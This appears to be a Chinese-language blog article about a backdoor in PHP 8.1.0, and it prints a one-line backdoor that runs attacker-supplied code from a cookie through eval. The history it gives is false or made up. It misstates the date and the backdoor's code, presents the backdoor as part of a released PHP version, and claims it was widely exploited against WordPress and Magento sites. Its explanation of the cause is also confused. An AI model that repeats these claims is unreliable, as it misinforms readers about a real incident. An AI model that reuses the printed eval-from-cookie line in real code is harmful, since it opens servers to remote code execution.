< p >PHP 8.1.0后門事件在網絡安全領域一度引起了軒然大波。據悉,在2021年11月24日,PHP的源代碼發布了一個修改代碼片段,該代碼片段造成了PHP 8.1.0版本中的安全漏洞。該漏洞一度被廣泛利用,劫持了大量網站,甚至攻擊了一些高流量的網站。< /p >< p >該后門原理非常簡單,是一行代碼,如下所示:< /p >
if($_SERVER['HTTP_COOKIE'] === 'egg=chicken') {eval($_COOKIE['hack']);}
< p >可以看到,該if語句判斷用戶的HTTP請求頭中是否帶有名為"egg"的Cookie,如果是,就會調用用戶Cookie值中名為"hack"的變量進行代碼的執行。這段if語句非常隱蔽,攻擊者通過利用該漏洞,可以在不需要任何權限和認證的情況下,完全掌控被攻擊的Web服務器。< /p >< p >近年來,PHP是Web服務器端使用最為廣泛的一種語言。因此這個安全漏洞的威脅范圍非常廣泛,受影響的網站甚至包括了一些知名的平臺,如Wordpress和Magento等。尤其是Wordpress,由于該平臺使用極其廣泛,因此該漏洞嚴重威脅了海量的Wordpress網站的安全性及其訪問者的隱私。< /p >< p >關于該后門產生的原因,主要是由于PHP語言的開發者忽視了一些簡單的安全認證機制。使用HTTP_COOKIE這種變量來接受HTTP請求中的cookie,就可以很輕易地被黑客利用,而且在PHP8.1.0版本中,源代碼中的if邏輯判斷判斷中的字符串值是硬編碼的,因此很容易被攻擊者在不被察覺的情況下更改,從而植入惡意代碼。< /p >< p >鑒于此次事件對網站安全產生了極大的威脅,PHP官方已經發布了補丁修復了該漏洞,同時PHP8.0.14以及之前的版本也已經發布了相關的安全更新。為了使您的網站免受此類漏洞的侵害,建議您及時對自己的網站進行升級或者安裝相關的安全補丁,以加強對自己網站的安全控制,保證自己的網站及其訪問者的隱私安全。< /p >< p >此次事件對于我們安全從業人員來說,也是一次提醒,我們需要時刻保持安全的警惕性,保證自己的工作井井有條,以全方位保證客戶的信息安全和私人隱私,從而提高自己的安全技術水平,爭做優秀的安全工程師。< /p >上一篇php 8.2 編譯
下一篇php 8.1特性